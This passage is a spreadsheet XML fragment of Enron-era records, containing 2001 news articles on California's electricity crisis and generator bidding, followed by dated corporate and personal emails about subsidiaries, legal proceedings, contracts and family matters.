administration that could hinder progress on global climate change policy._x000D_
_x000D_
The Senate banned new coal mining and oil and gas drilling in national _x000D_
monuments. Other recent rebuffs included rejections of administration _x000D_
initiatives on such issues as the Endangered Species Act, hard-rock mining _x000D_
regulations and offshore drilling for oil and gas. _x000D_
Copyright 2001, Los Angeles Times &lt;http://www.latimes.com&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Federal Caps Didn't Deter Higher Prices_x000D_
Power: Cal-ISO study says suppliers continued to charge as much as five times _x000D_
more than the imposed limits._x000D_
By NANCY VOGEL_x000D_
TIMES STAFF WRITER_x000D_
_x000D_
July 27 2001_x000D_
_x000D_
SACRAMENTO -- After federal regulators limited wholesale electricity prices _x000D_
last month, big private sellers of power in California continued to ask as _x000D_
much as five times more for electricity than the federal cap, according to a _x000D_
confidential study by state grid operators._x000D_
_x000D_
The analysis by the California Independent System Operator covers only the _x000D_
first week after the caps were imposed June 20. Cal-ISO has submitted the _x000D_
data to federal regulators for potential investigation. The report is a _x000D_
summary of what Cal-ISO calls possible anti-competitive behavior by Duke _x000D_
Energy, Williams Cos., Mirant Corp., Reliant Energy and Dynegy Corp._x000D_
_x000D_
"In a truly competitive market we would expect these suppliers to bid very _x000D_
close to their actual operating cost," said Greg Cook, senior policy analyst _x000D_
with Cal-ISO's Department of Market Analysis. The state did not necessarily _x000D_
purchase any power at the high prices being demanded. Instead, the _x000D_
significance of the bids is that they show how California could find itself _x000D_
paying exorbitant prices for electricity again if hot weather returns and _x000D_
conservation slackens, said Frank Wolak, a Stanford University economist who _x000D_
studies the California electricity market._x000D_
_x000D_
"The bottom line is that the generators are putting out these bids in _x000D_
expectation of high demand," he said. "If weather all of a sudden gets really _x000D_
hot from Southern to Northern California, the bids submitted by generators _x000D_
could be very costly to California."_x000D_
_x000D_
Cal-ISO calculated the cost of production for each company based on the _x000D_
efficiency of its power plants and estimates of what each paid for natural _x000D_
gas to fuel the plants._x000D_
_x000D_
The average cost for the five was $105 per megawatt-hour, which closely _x000D_
matches the federal price limit in California, which now stands at $101 per _x000D_
megawatt-hour. According to the power bidding procedures, companies that bid _x000D_
at or below their cost of production often still get paid a higher price, _x000D_
allowing them to make a substantial profit._x000D_
_x000D_
On average, four of the five companies submitted bids either slightly below _x000D_
or slightly above their cost of production. But with the exception of _x000D_
Atlanta-based Mirant, each company at times submitted bids that were _x000D_
substantially higher. Houston-based Reliant, for example, bid as much as $540 _x000D_
per megawatt-hour, more than five times its estimated cost. Overall, _x000D_
Reliant's average bid was close to costs, according to the analysis._x000D_
_x000D_
Cal-ISO identified companies by code in its report. Sources familiar with the _x000D_
study identified the companies for The Times._x000D_
_x000D_
The Cal-ISO report singled out "Supplier 5," identified by sources as _x000D_
Charlotte, N.C.-based Duke Energy, saying the company "continues to bid _x000D_
significantly in excess of its operating costs."_x000D_
_x000D_
Duke owns two large power plants on the central coast. It marked up its bids _x000D_
an average of 88% beyond its cost to produce electricity, according to the _x000D_
analysis. For example, it cost Duke $85 to $121 to generate a megawatt-hour _x000D_
of electricity in the time period studied, the report shows, but the company _x000D_
offered to sell a megawatt-hour from $149 to $195._x000D_
_x000D_
Duke spokesman Tom Williams on Thursday said, "The use of the data in some _x000D_
cases doesn't appear to add up and in all cases appears to be selective and _x000D_
could easily be misunderstood." Duke sells nearly the entire output of its _x000D_
power plants under long-term contracts, and not on the spot market, which the _x000D_
Cal-ISO report studied, he noted._x000D_
_x000D_
Reliant spokesman Richard Wheatley said, "We're looking at the data, and we _x000D_
question whether or not it is correct."_x000D_
_x000D_
A combination of cool weather, heavy conservation, the start-up of new power _x000D_
plants and recently signed long-term power contracts that guarantee supplies _x000D_
have eased the state's electricity crisis in recent weeks._x000D_
_x000D_
Market prices that as recently as May averaged $271 per megawatt-hour have _x000D_
dropped to less than $100 per megawatt-hour._x000D_
_x000D_
The more abundant power supplies have freed grid operators to ignore _x000D_
higher-priced bids. But they will have to consider paying such prices to _x000D_
avoid blackouts if supplies tighten, Wolak said._x000D_
_x000D_
Such a scenario would test the effectiveness of the Federal Energy Regulatory _x000D_
Commission order issued June 19, he said._x000D_
_x000D_
The bids of the five companies analyzed were offers of sales to Cal-ISO, a _x000D_
Folsom-based agency that manages the electrical transmission grid serving 75% _x000D_
of California. Cal-ISO buys power on short notice to smooth the flow on the _x000D_
state's electrical freeway and avert blackouts._x000D_
_x000D_
As California's fledgling market began to go haywire last fall, Cal-ISO _x000D_
workers struggled to purchase as much as 30% of the state's power demand with _x000D_
just hours to spare. Since then, the market has stabilized, and Cal-ISO's _x000D_
purchases now amount to roughly 5% of the electricity California consumes._x000D_
_x000D_
RELATED STORY_x000D_
_x000D_
Power profits: Power plant operator Calpine said its quarterly profit more _x000D_
than doubled. C2 _x000D_
Copyright 2001, Los Angeles Times &lt;http://www.latimes.com&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Calpine profits double on skyrocketing sales _x000D_
Escalating power prices inspire plant building program _x000D_
Carolyn Said, Chronicle Staff Writer &lt;mailto:csaid@sfchronicle.com&gt;_x000D_
Friday, July 27, 2001 _x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; _x000D_
URL: _x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2001/07/27/_x000D_
BU234287.DTL&gt;_x000D_
Fueled by high electricity prices, power generator Calpine Corp. reported _x000D_
strong second-quarter results yesterday. _x000D_
Calpine of San Jose said profit for the quarter ended June 30 almost doubled _x000D_
to $107.7 million (32 cents per share) from $59.5 million (20 cents) during _x000D_
the year-ago quarter. Revenue almost quadrupled to $1.61 billion from $417.2 _x000D_
million a year ago. _x000D_
Excluding charges related to the acquisition of Canada's Encal Energy, _x000D_
Calpine's net income was $132.2 million (39 cents), well above the 31 cents _x000D_
per share predicted by analysts, according to Thomson Financial/First Call. _x000D_
Calpine is on an ambitious path to expand its roster of generating plants. By _x000D_
the end of 2005, it expects to have 75,000 megawatts in operation in the _x000D_
United States, including 12,000 megawatts in California. A megawatt is about _x000D_
enough power for 1,000 homes. _x000D_
The company, which generates 2,428 megawatts in California, this summer _x000D_
opened the state's first two major power plants in a decade. The new plants _x000D_
in Yuba City (Sutter County) and Pittsburg generate 547 and 555 megawatts, _x000D_
respectively. _x000D_
Combined with a new plant in Arizona that sells power to California, _x000D_
Calpine's new facilities helped the state stave off threatened blackouts this _x000D_
summer, Chief Executive Officer Peter Cartwright said. _x000D_
Calpine is building the 847-megawatt Delta Energy Center in Pittsburg, _x000D_
scheduled to open in May, and a 750-megawatt plant in Kern County, due in _x000D_
June 2003. _x000D_
It is also awaiting an August decision by the California Energy Commission on _x000D_
its proposed 600-megawatt Metcalf Energy Center in San Jose. _x000D_
"California is a very good market for us," said Bill Highlander, a Calpine _x000D_
spokesman. "The pricing in California has benefited Calpine." _x000D_
However, he said, the company was not one of the traders that focused on _x000D_
making top dollar in California's volatile spot market, because its business _x000D_
model concentrated on selling electricity through long-term contracts. _x000D_
During the past few months, Calpine signed 10-year and 20-year contracts with _x000D_
the state for as much as 2,500 megawatts, at prices ranging from $58.60 to _x000D_
$73 per megawatt hour. _x000D_
With most of its plants fired by natural gas, Calpine wants to control about _x000D_
a quarter of the gas it uses, Highlander said. Its April purchase of Encal _x000D_
Energy for $1.77 billion more than doubled its gas reserves, to about 1. 7 _x000D_
trillion cubic feet equivalent, according to Hoover's Online. _x000D_
Calpine's stock closed up $1.08 at $36.89 yesterday. _x000D_
E-mail Carolyn Said at csaid@sfchronicle.com &lt;mailto:csaid@sfchronicle.com&gt;. _x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; Page B - 1 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Generators continue to set high electricity prices _x000D_
_x000D_
Friday, July 27, 2001 _x000D_
,2001 Associated Press _x000D_
URL: _x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=/news/archive/2001/07/27/state_x000D_
0359EDT0121.DTL&gt;_x000D_
(07-27) 00:59 PDT LOS ANGELES (AP) -- _x000D_
Power wholesalers continued to demand higher prices for energy despite _x000D_
federal regulation that capped electricity rates, according to a confidential _x000D_
report by the California Independent System Operator. _x000D_
In one case, an energy company charged as much as five times more for _x000D_
electricity than the federal cap, which were imposed June 20. State grid _x000D_
operators have given the study to federal regulators for a possible _x000D_
investigation, the Los Angeles Times reported Friday. _x000D_
Five companies were identified by code in the report and sources familiar _x000D_
with the study named the wholesalers for the Times. They include Duke Energy, _x000D_
Dynegy Corp., Mirant Corp., Reliant Corp., and Williams Cos. _x000D_
The average price charged by the five power companies was $105 per _x000D_
megawatt-hour, which closely matches the federal price limit in California _x000D_
set at $101 per megawatt-hour. _x000D_
Four of the five companies submitted bids either just below or just above _x000D_
their cost of production. Houston-based Reliant, however, asked as much as _x000D_
$540 per megawatt-hour in some cases. Overall, the company's average bid was _x000D_
close to costs, the report said. _x000D_
The state wasn't required to purchase power at the rates set by wholesalers _x000D_
but the bids reflect a potential repeat of charging exorbitant electricity _x000D_
prices if temperatures soar and conservation dwindles, said Frank Wolak, a _x000D_
Stanford University economist who studies the California electricity market. _x000D_
"The bottom line is that the generators are putting out these bids in _x000D_
expectation of high demand," he said. "If weather all of a sudden gets really _x000D_
hot from Southern to Northern California, the bids submitted by generators _x000D_
could be very costly to California." _x000D_
The Cal-ISO report singled out Duke Energy, noting it "continues to bid _x000D_
significantly in excess of its operating costs." The report shows the _x000D_
company's cost to produce electricity was between $85 and $121 but it offered _x000D_
to sell a megawatt-hour from $149 to $195. _x000D_
Cal-ISO calculated the cost of production for each company based on the _x000D_
efficiency of its power plants and estimates what each paid for natural gas _x000D_
to fuel the plants. _x000D_
"The use of the data in some cases doesn't appear to add up and in all cases _x000D_
appears to be selective and could easily be misunderstood," said Duke _x000D_
spokesman Tom Williams. _x000D_
,2001 Associated Press _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
THE ENERGY CRUNCH _x000D_
Environmental suit against power plant _x000D_
Expansion called danger to slough _x000D_
Christian Berthelsen, Scott Winokur, Chronicle Staff Writers _x000D_
&lt;mailto:cberthelsen@sfchronicle.com&gt;_x000D_
Friday, July 27, 2001 _x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; _x000D_
URL: _x000D_
&lt;http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2001/07/27/_x000D_
MN236840.DTL&gt;_x000D_
An environmental group filed suit yesterday to overturn a permit granted to _x000D_
Duke Energy Co. to expand a major power plant south of Santa Cruz. _x000D_
Saying the permit was illegally awarded, the suit warns that the resulting _x000D_
project will damage the ecologically important Elkorn Slough. _x000D_
Voices of the Wetlands accuses the board that awarded the permit of violating _x000D_
federal law by not requiring Duke to use the best possible technology to _x000D_
minimize impacts on the environment around the Moss Landing power plant. _x000D_
If plans to expand the plant proceed without change, the group said, it would _x000D_
kill off critical organisms at the bottom of the food chain. _x000D_
The suit, filed in Monterey County against the California State Water _x000D_
Resources Control Board and the regional board that serves the central coast, _x000D_
seeks a court order to return the case to the regional water district so that _x000D_
more environmentally sensitive cooling technology can be ordered for use at _x000D_
the plant. _x000D_
State officials said yesterday that the issues raised in the suit were _x000D_
considered and rejected during the initial permit approval process last year, _x000D_
and again during the appeal process this year. _x000D_
The case comes amid enormous pressure on state officials, in light of _x000D_
California's energy crisis, to rapidly accelerate power plant approvals and _x000D_
expand the amount of power generation available. _x000D_
Against this backdrop, the state water board on June 21 essentially rejected _x000D_
environmental groups' appeal that had sought to overturn the district board's _x000D_
decision approving the Moss Landing expansion permit. _x000D_
On another front, board members of the California Energy Commission took _x000D_
testimony earlier this week on a proposal to curtail public review of plant _x000D_
project proposals, with one board member, Robert A. Laurie, acknowledging in _x000D_
an interview that he believed "in some cases" it posed one of the most time- _x000D_
consuming aspects of project approval. A recommendation is expected within _x000D_
the next month. _x000D_
Duke, of Charlotte, N.C., bought the Moss Landing plant from Pacific Gas &amp; _x000D_
Electric Co. in 1998, when the Northern California utility sold off many of _x000D_
its facilities to prepare for deregulation of the energy market. _x000D_
The plant was built in 1950 using a cooling system technology that sucks _x000D_
water out of the Elkorn Slough and Monterey Bay to cool generating turbines _x000D_
before spitting the water out into the Pacific Ocean. _x000D_
The group says wildlife conditions and sea otter population have improved _x000D_
markedly since PG&amp;E mothballed many of the generating units at Moss Landing _x000D_
in 1995. _x000D_
But Duke now is proposing to resurrect parts of the cooling system in a major _x000D_
expansion that will make Moss Landing the state's largest power plant after _x000D_
its completion next summer. _x000D_
With an output of 2,538 megawatts, the plant when completed is expected to _x000D_
account for 30 percent of all new electricity generated in California next _x000D_
year, serving about 2.5 million households in the Monterey, Santa Cruz and _x000D_
southern Santa Clara County areas, including San Jose. _x000D_
Regional water quality board officials declined comment yesterday, citing the _x000D_
pending litigation. But in public documents filed yesterday, water officials _x000D_
said cooling alternatives had been considered and rejected. The documents did _x000D_
not elaborate on why they were not mandated. _x000D_
Duke had acknowledged during the process that more ecologically sensitive _x000D_
technologies were available, but at prohibitive costs of $20 million to $50 _x000D_
million more. _x000D_
Deborah Sivas, an attorney for the Earthjustice Environmental Law Clinic, _x000D_
which filed the suit on behalf of Voices of the Wetlands, considered the best _x000D_
technology alternatives mandatory, not optional. She said the board had not _x000D_
considered alternative approaches in reaching its conclusions. _x000D_
E-mail the writers at swinokur@sfchronicle.com _x000D_
&lt;mailto:swinokur@sfchronicle.com&gt; and cberthelsen@sfchronicle.com _x000D_
&lt;mailto:cberthelsen@sfchronicle.com&gt;. _x000D_
,2001 San Francisco Chronicle &lt;/chronicle/info/copyright&gt; Page A - 3 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Let's make a real deal with Edison _x000D_
July 27, 2001 _x000D_
By JONATHAN LAN</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 05:15:36 -0800 (PST)</t>
  </si>
  <si>
    <t>TRV Notification:  (West VaR - 11/16/2001)</t>
  </si>
  <si>
    <t>The report named: West VaR &lt;http://trv.corp.enron.com/linkFromExcel.asp?report_cd=36&amp;report_name=West+VaR&amp;category_cd=2&amp;category_name=WEST&amp;toc_hide=1&amp;sTV1=2&amp;TV1Exp=Y&amp;current_efct_date=11/16/2001&gt;, published as of 11/16/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 00:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Mavrix</t>
  </si>
  <si>
    <t xml:space="preserve">We all knew about this concept--its Danny's "Newco" idea.  The only thing _x000D_
that is new is they finally decided on a name and got the paperwork for the _x000D_
new corporate entity out of the Corporate Secretary's office.  I knew about _x000D_
the name a couple weeks ago.  As far as I know, no one has signed off on any _x000D_
particular transaction or on a procedure to follow when "Mavrix" starts _x000D_
transacting business.  We all better understand at that point that this may _x000D_
be a "lose lose" deal--if Mavrix makes a ton of money, everyone will come _x000D_
after it (as soon as they find out) and claim we arre playing games with _x000D_
confidential information if Mavrix is trading capacity on the Enron pipes.  _x000D_
If Mavrix loses money, tough cookie--there's no way to plow the losses back _x000D_
into some regulated entity.  It is probably now time to have a prayer meeting _x000D_
with Danny, Steve, and probably Stan, just to make sure everyone knows what _x000D_
we all think about the risks before they charge off and start doing deals.  _x000D_
DF _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mary Kay Miller                           02/01/2001 07:37 AM_x000D_
	_x000D_
_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Mavrix_x000D_
_x000D_
Were you involved?  MK_x000D_
---------------------- Forwarded by Mary Kay Miller/ET&amp;S/Enron on 02/01/2001 _x000D_
07:37 AM ---------------------------_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
01/31/2001 09:42 AM_x000D_
To: Mary Kay Miller/ET&amp;S/Enron@ENRON_x000D_
cc: Shelley Corman/ET&amp;S/Enron _x000D_
_x000D_
Subject: Re: Mavrix  _x000D_
_x000D_
I thought the officers had discussed this with Danny quite some time ago, as _x000D_
the organization of the company was set in motion in early Dec._x000D_
_x000D_
Mavrix Transportation Trading Corp. has been organized as a wholly-owned _x000D_
subsidiary of ETS for the purpose of transportation capacity management.  The _x000D_
officers are the same as the slate of officers of Transwestern.   The company _x000D_
will neither buy or sell gas nor use transportation capacity.  However, it _x000D_
does plan to enter into natural gas transportation contracts (and resell the _x000D_
capacity thru capacity release).  That is why the creditworthiness question _x000D_
has come up._x000D_
I really don't have any information so send you, unless you want to see the _x000D_
organizational documents.  Steve Harris can answer any business-related _x000D_
questions you have.  Or, I'll be happy to try to answer any other questions._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mary Kay Miller                           01/31/2001 07:16 AM_x000D_
	_x000D_
_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc: Shelley Corman/ET&amp;S/Enron _x000D_
_x000D_
Subject: Re: Mavrix  _x000D_
_x000D_
Susan, maybe I'm the only one, but I hadn't heard of this new company and _x000D_
what it is to be used for until Mondauy's staff meeting.  What details do we _x000D_
have on this?  can you send me some info on this?  thanks  MK_x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
01/30/2001 02:27 PM_x000D_
To: Drew Fossum@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Steven _x000D_
Harris/ET&amp;S/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, Tracy _x000D_
Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Mavrix_x000D_
_x000D_
Mavrix Transportation Trading Corp., which is a subsidiary of ETS, needs to _x000D_
satisfy TW's creditworthiness requirements in order to enter into a _x000D_
transportation agreement with TW.  Paul Cherry has suggested that Northern _x000D_
Natural Gas issue a guarantee.  Please let me know whether you think this _x000D_
would be acceptable.  If Mavrix wanted to hold NNG capacity, TW could issue _x000D_
the guarantee._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 11:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Government Affairs Organizational Changes</t>
  </si>
  <si>
    <t>Rick, I want to compliment you on this well-written and information-packed _x000D_
announcement.  It's got to make employees in your group feel proud to be on _x000D_
your team.  It's also the kind of message (friendly, congratulatory, _x000D_
celebratory) that would make anyone feel good about working here.  Others _x000D_
should follow your example. _x000D_
_x000D_
Mary</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 03:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'richard.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Amparo Proceeding</t>
  </si>
  <si>
    <t xml:space="preserve">Attached for your consideration is a memo drafted by a partner in the Lopez _x000D_
Velarde firm concerning the status of the prior Amparo proceedings that were _x000D_
virtually identical to the proceeding in which Enron Energia Industrial is an _x000D_
interested party.  Also attached is a chart describing all six of the _x000D_
proceedings and the status of each._x000D_
_x000D_
I have heard nothing concerning what actions are being taken to obtain an _x000D_
opinion from US counsel concerning the risks, if any, to Enron in providing _x000D_
an indemnity to the Inter-American Development Bank ("IDB") relative to this _x000D_
litigation.  If we are to enable the provide a proposal to the IDB within the _x000D_
next day, the scheduled closing date of November 16, 2000, is in extreme _x000D_
jeopardy.  Please advise of the status of the opinion._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 08:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hi  _x000D_
_x000D_
I'm thrilled you are also speaking at ISDA.Thanks_x000D_
_x000D_
Any chance you can hit on Wed? If not we may have to resume our REGULAR _x000D_
WEEKLY SCHEDULE after the holidays.  Let me know.</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 05:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lenine.jeganathan@enron.com', 'luis.mena@enron.com', 'shanna.husser@enron.com', 'christa.winfrey@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>Brian's B-day</t>
  </si>
  <si>
    <t>Since most were out of town last weekend, we were thinking of celebrating _x000D_
Brian's birthday again tonight at The Cheesecak Factory at 7:00._x000D_
_x000D_
Let me know if you will be able to attend._x000D_
_x000D_
-Eric</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 01:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Now for the good news, He wants to set in with the ya'll when you meet with_x000D_
Mary.   I'd just have the meeting then tell him about it.  He also wants them_x000D_
off the place in 14 days.   I told him no, to chill and that we will buy him_x000D_
out.   That should hold him off a few days.   So don't move yet on getting my_x000D_
money together?_x000D_
_x000D_
Took Barb out to eat last night at Johnny Correno's.   No motorcycle riding _x000D_
for_x000D_
me._x000D_
_x000D_
Oh yeah, Don is going to see the Dr. about something to help with his nerves _x000D_
and_x000D_
to stop smoking.  He is going to tell him he is drinking with the stuff that _x000D_
he_x000D_
is taking.   Maybe the Doc can give him something to help settle down all this_x000D_
hostility._x000D_
_x000D_
I'll work on the inventory list tonight.   You need to pull together all the_x000D_
finical data, CD's etc. that are out and that we  cashed in.   Then we will_x000D_
stick in new values.  Also need to give a good fair market value on items we _x000D_
are_x000D_
selling so we do not have to pay tax on the stuff right.  If we value the _x000D_
place_x000D_
at $175,000 and sell for less, then we don't have to pay taxes on the money, _x000D_
so_x000D_
I was told._x000D_
_x000D_
_x000D_
See Ya._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris.Germany@enron.com on 10/24/2000 08:09:57 AM_x000D_
To:   Jerry W Germany_x000D_
cc:_x000D_
Subject:  Yo_x000D_
_x000D_
_x000D_
_x000D_
Update.  Spoke with the lawyer yesterday.  We can't buy Don out right now._x000D_
We need to turn in the final inventory list, get things resolved with Mary_x000D_
(be it good or bad) then we can buy Don out._x000D_
_x000D_
She still thinks that we won't have any issues with Mary.  After we provide_x000D_
the inventory list, she wants me to meet with her (Joal), Mary, and Mary's_x000D_
lawyer to see what we need to do to get this CONFLICT resolved.  Joal_x000D_
thinks we should be able to do this during the first 2 weeks of November._x000D_
_x000D_
I have a bad cold and I went scooter riding last night.  Do you care?_x000D_
_x000D_
I can't blame brother too much, I still bounce back and forth between major_x000D_
frustration and apathy on the East Texas issue.  Hope for the best!!_x000D_
_x000D_
Later_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 07:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hanover's desired changes to compression contract in WY.</t>
  </si>
  <si>
    <t xml:space="preserve">Shonnie,  I believe Brian left you a voicemail about this. Here is the latest _x000D_
from Hanover.  These guys are trying to renegotiate this deal.  Lets talk _x000D_
about this after you have had a chance to review._x000D_
_x000D_
_x000D_
----- Forwarded by Gerald Nemec/HOU/ECT on 06/26/2000 02:31 PM -----_x000D_
_x000D_
	Ken Choyce@ENRON_x000D_
	06/21/2000 02:37 PM_x000D_
		 _x000D_
		 To: Gerald Nemec/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Hanover's desired changes to compression contract in WY._x000D_
_x000D_
Gerald,_x000D_
_x000D_
Wanted to keep you in the loop on where Hanover would like to see things _x000D_
going with our contract.  They've been complaining almost from day 1 and _x000D_
their format is getting a little more formal and aggressive as seen in the _x000D_
attached spreadsheet and memo.  The attached memo in my opinion violates in _x000D_
several points made the spirit of the intent of the agreement as executed.  _x000D_
The guy that put this together (Jerry Griffith) was not a Hanover employee _x000D_
when the contract was negotiated.  I believe he is being put up to this by _x000D_
his management who appear to want to change some very fundamental things that _x000D_
were agreed to (most of which were explicitly spelled out in the document).  _x000D_
No action requested of you I just wanted you to be informed. Thanks_x000D_
_x000D_
Ken_x000D_
---------------------- Forwarded by Ken Choyce/DEN/ECT on 06/21/2000 02:05 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Karl Durant" &lt;kdurant@vcn.com&gt;                           06/19/2000 _x000D_
03:27 PM_x000D_
	_x000D_
_x000D_
To: Ken Choyce/DEN/ECT@Enron_x000D_
cc:  _x000D_
Subject: Fw: Enron Contract Enhancement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Jerry Griffith &lt;112715.2741@compuserve.com&gt;_x000D_
To: Paul Ludwick &lt;pludwick1@compuserve.com&gt;; Karl Durant &lt;kdurant@vcn.com&gt;_x000D_
Sent: Monday, June 19, 2000 10:27 AM_x000D_
Subject: Enron Contract Enhancement_x000D_
_x000D_
_x000D_
this is our strawman, best shot at a methodology to get started;_x000D_
pls comment,_x000D_
I would like to proceed with this and try to get together in Denver_x000D_
sometime during the first week in July, maybe Weds &amp; Thurs &amp; or Friday or_x000D_
possibly_x000D_
the end of next week._x000D_
We need this resolved, an acceptable consencious to allow us to proceed as_x000D_
necessary in the future._x000D_
thx_x000D_
Jerry_x000D_
_x000D_
_x000D_
 - Contract Enhancement.doc_x000D_
 - ENRON CONTRACT SCHEDULE.xls_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 05:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: California Update 4/12/01</t>
  </si>
  <si>
    <t>I don't know about the roommate info, but I do know that they go back a very _x000D_
long way.  Then Gov. Jerry Brown (now Mayor of Oakland) appointed Bryson to _x000D_
be the President of the California PUC.  Way before out time---I think that _x000D_
it was in the early '80s.  At the same time, Davis was Brown's chief of _x000D_
staff---so their relationship goes way back._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ICC Petition</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 08/31/2000 03:57 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Boyd J. Springer" &lt;bjspringer%JONESDAY@JonesDay.com&gt; on 08/31/2000 03:33:34 _x000D_
PM_x000D_
To: gregg.penman@enron.com_x000D_
cc: kay.mann@enron.com _x000D_
_x000D_
Subject: ICC Petition_x000D_
_x000D_
_x000D_
________________________________________________________________x000D_
_x000D_
This message and any attachments are intended for the individual or entity_x000D_
named above.  If you are not the intended recipient, please do not read,_x000D_
copy, use or disclose this communication to others; also please notify the_x000D_
sender by replying to this message, and then delete it from your system._x000D_
Thank you._x000D_
________________________________________________________________x000D_
_x000D_
Jerry Fox reports that Peoples is reviewing the Peitition and plans to_x000D_
generate a new draft. Jerry indicates that Peoples does not think it will_x000D_
be possible to identify a standard or guideline which the ICC could_x000D_
consider with respect to the "complex" transactions covered by the_x000D_
agreement (for example, pricing within a designated percentage or amount of_x000D_
an index level). Do you have any thoughts on this? The Petitiion is asking_x000D_
that the ICC approve these transactions in advance, so it is best to_x000D_
explain as fully as possible what the transactions will look like. Jerry is_x000D_
also not sure what can be said about why these transaction benefit the_x000D_
public (the standard for approval under 7-101).  I had assumed that the_x000D_
transactions might use otherwise idle capacity or create a credit to gas_x000D_
cost otherwise recoverable under the Illinois PGA. Jerry is still_x000D_
considering this. Jerry reports that Mary Klyshaaf and others spoke to the_x000D_
ICC Staff about this and suggested that the affiliate agreement should be_x000D_
approved because transactions under it are similar to transactions_x000D_
currently on-going with non-affiliates. Jerry, however, is uncertain about_x000D_
the nature of these transactions. I suggested that one approach might be to_x000D_
identlfy some of the referenced transactions to see what can be said about_x000D_
why they are in the public interest. If you have any ideas on these points,_x000D_
please let me know. Jerry seems to agree that the Petition would be_x000D_
improved if information could be added to explain why transactions under_x000D_
the agreement would be beneficial to Peoples' customers._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 08:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California invoice from Bracewell &amp; Patterson</t>
  </si>
  <si>
    <t xml:space="preserve"> I will process the California FERC Regulatory invoice for payment today and _x000D_
have faxed a copy for your review.  If you have any comments, please contact _x000D_
me at (202) 466-9147 by 6:00 PM (edt) today. _x000D_
_x000D_
Thanx</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 16:43:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: &lt;&lt;Concur Expense Document&gt;&gt; - Lunch</t>
  </si>
  <si>
    <t>FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	enron_update@concureworkplace.com@ENRON  _x000D_
Sent:	Thursday, October 25, 2001 5:59 PM_x000D_
To:	James Derrick Jr._x000D_
Subject:	&lt;&lt;Concur Expense Document&gt;&gt; - Lunch_x000D_
_x000D_
The Approval status has changed on the following report:_x000D_
_x000D_
Status last changed by: Rosalee T. Fleming_x000D_
Expense Report Name: Lunch_x000D_
Report Total: $46.05_x000D_
Amount Due Employee: $46.05_x000D_
Amount Approved: $46.05_x000D_
Amount Paid: $0.00_x000D_
Approval Status: Approved_x000D_
Payment Status: Pending_x000D_
_x000D_
_x000D_
To review this expense report, click on the following link for Concur Expense._x000D_
http://expensexms.enron.com</t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 04:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'randy.young@enron.com', 'frank.stabler@enron.com'})</t>
  </si>
  <si>
    <t>Equity Hedges for CEG, CEG Rio and Gaspart LDCs</t>
  </si>
  <si>
